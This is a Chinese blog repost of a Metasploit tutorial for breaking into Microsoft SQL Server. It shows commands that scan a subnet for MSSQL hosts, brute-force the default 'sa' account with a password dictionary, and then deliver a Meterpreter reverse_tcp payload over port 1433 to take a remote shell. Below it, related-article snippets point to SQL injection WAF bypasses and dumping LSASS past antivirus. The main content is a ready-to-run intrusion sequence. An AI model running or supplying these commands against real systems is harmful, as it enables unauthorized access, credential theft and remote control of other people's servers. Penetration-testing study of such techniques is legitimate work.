从攻击MS SQL Server到获得系统访问权限

最新推荐文章于 2023-06-17 21:16:36 发布
最新推荐文章于 2023-06-17 21:16:36 发布
阅读量343 收藏
点赞数
分类专栏: kali

from:

https://www.freebuf.com/articles/database/22997.html

 

命令:

use auxiliary/scanner/mssql/mssql_ping
set RHOSTS 192.168.23.0/24 (我们目标的IP段)
set THREADS 8
run

 

 

攻击

这次攻击是基于一个简单的原理。在大多数情况下,微软的SQL服务器将被安装在一个混合模式下。它的默认用户是“sa”,很多时候对于默认用户只有一个简单的密码。这意味着它会比较容易进行暴力破解得到密码,使用字典文件。这些字典文件可以从网上下载或自己生成。生成定制字典的好处是,允许手动添加特定的术语和字段,比如在安装应用程序是可能使用软相关件名称或销售商作为密码。例如,Sandstone的数据库密码就很可能是像“Sandstone01”这样的字段。

对于攻击,我们将使用内置的工具MSSQL_Login。指定目标和密码文件之后,攻击就开始了。

命令:

use auxiliary/scanner/mssql/mssql_login
Set PASS_FILE /root/passwords.txt (字典文件)
Set RHOSTS 192.168.23.100
Set Threads 8
Set verbose false
run

 

 

现在我们可以用这个SA密码与我们的目标计算机建立联系。Kali Linux内置有一个名为mssql_payload的工具。这个工具将允许我们通过端口1433发送我们新的登陆凭据的有效载荷。在这里我们就是基于此攻击目标与我们之间的会话的。

命令:

use exploit/windows/mssql/mssql_payload
set RHOST 192.168.23.100 (我们的目标)
set password Password01 (我们刚刚获取的密码)
use payload/windows/meterpreter/reverse_tcp(our selected payload)
exploit
马克88
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSSQL渗透备忘录
qq_40710190的博客
07-07 947
MSSQL
使用Metasploit对MSSQL渗透测试步骤——学习笔记
渗透测试
06-04 1053
学习笔记 使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh) 第一步,使用mssql_ping获取信息 Name: MSSQL Ping Utility Module: auxiliary/scanner/mssql/mssql_ping License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC <mc@metasploit.
sql1433端口msf、hydra弱口令爆破,获得sql-server的权限,通过几种方式能够提权
weixin_64655821的博客
08-31 3532
如果得到了1433端口,进行弱口令爆破 ,百度下1433端口,弱口令爆破的方式,kali 中msf hydra弱口令爆破 。总结获得弱口令,获得sql-server的权限,通过几种方式能够提权。
mssql数据库渗透测试
最新发布
weixin_43708659的博客
06-17 340
mssql数据库渗透测试
渗透测试工具
weixin_43227251的博客
04-12 333
介绍 渗透测试工具备忘单,这是典型渗透测试约定的快速参考高级概述。设计为快速参考备忘单,它提供了第三方笔测试公司在执行手动基础结构渗透测试时将要运行的典型命令的高级概述。有关更多详细信息,我建议使用该工具的手册文件,或者从右侧菜单中选择更具体的笔测试备忘单。 ifconfig eth0 xxx.xxx.xxx.xxx/24 子网划分 ipcalc xxx.xxx.xxx.xxx/24 ipcalc xxx.xxx.xxx.xxx 255.255.255.0 OSINT 被动信息收集 域名解析 WHOIS枚举
msf中mssql扫描以及漏洞利用模块
weixin_33725270的博客
10-24 1363
auxiliary/admin/mssql/mssql_enum       normal     Microsoft SQL Server Configuration Enumeratorauxiliary/admin/mssql/mssql_enum_domain_accounts     normal     Microsoft SQL Server SUSER_SNAME Windows ...
渗透杂记-2013-07-13 windows/mssql/mssql_payload
weixin_30421809的博客
12-28 150
扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts for scanning. Initiating Ping Scan at 09:36 Scanning 203.171.239.* [4 ports] Completed Pi...
BT5入侵mssql
天元喜羊羊的博客
08-18 3636
mssql_ping: msf auxiliary(mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- ---
msf 连接mssql_MSF爆破MSSQL
weixin_33195162的博客
02-07 546
msf auxiliary(scanner/mssql/mssql_login) >show optionsModule options (auxiliary/scanner/mssql/mssql_login):Name Current Setting Required Description---- ...
MSF---MSSQL漏洞发现
weixin_46297209的博客
09-26 1474
msf关于mssql的漏洞发现
Metasploit-MSSQL渗透-实战篇
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
web安全学习-sql注入-针对mssql(sqlserver)的攻击
Shanfenglan's blog
03-26 1279
文章目录0x00 前言0x01 mssql环境下需要了解的几个特性1. iis特性1.1 %特性(ASP+IIS)1.2 %u特性(asp+iis和aspx+iis)1.3 另类%u特性(ASP+IIS)2. mssql特性1. 空白字符2. 注释符3. 特殊数值4. 运算符0x02 测试过程0x03 自动化生成bypass_payload脚本编写总结参考文章 0x00 前言 mssql一般的环境是iis+asp或iis+aspx,我们先了解一下mssql的特性。 0x01 mssql环境下需要了解的几个
mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗
7Riven's blog
11-07 3307
1.注入类型 布尔盲注:http://192.168.232.174/Test.aspx?id=1and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100 验证如下: 时间盲注:http://192.168.232.174/test.aspx?id=1;if (ascii(substr...
截获SQL Server客户端登录SQL Server服务器的密码
凤凰涅磐,做不老的程序员
12-07 604
我们都知道,从WinForms应用程序访问数据库服务器,需要使用连接字符串。如果使用的是用户名/密码的方式连接,一般我们都会加密连接字符串来增强安全性。今天才知道,这是远远不够的。 通过网络数据包捕获工具,我们可以截获到SQL Server采用的TDS协议的数据报文。然后可以找到相应的登录报文。 当然,登录用户的密码是经过混淆的,只不过,混淆的方法很简单。非常容易破解。 混淆的过程如下: 将...
导出windows密码技巧总结
渗透测试研究中心
12-16 6217
一、使用RPC控制lsass加载SSP,实现DUMP LSASS绕过杀软 1.已编译好的ssp.dll(建议自己编译) spp.dll 需要修改为完整的绝对路径,测试环境是win2012 管理员权限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system权限。 编译成功的spp.dll文件以及loader注入器: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/l
Metasploit -- 各类密码破解
weixin_41489908的博客
05-06 2190
你说什么最难受?是相爱的人见不了面?还是最爱的人在别人身边? ---- 网易云热评 一、FTP服务 1、文件传输协议,是用于在网络上进行文件传输的一套标准协议。破解成功之后可查看是否有文件上传权限,若有,可进一步利用,若没有,则可以获取一些敏感数据。 2、默认端口:21 3、模块位置:auxiliary/scanner/ftp/ftp_login 4、选择模块、设置目标主机、设置用...
Metasploit 整理笔记
热门推荐
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
渗透之——Metasploit渗透MSSQL
冰河的专栏
01-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576 攻击kali 192.168.109.137 靶机 Win7_x64 192.168.109.139 数据库 MSSQL 2008 R2 MSSQL运行在TCP的1433端口以及UDP的1434端口 1.使用NMAP对MSSQL进行踩点 这里,我们使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值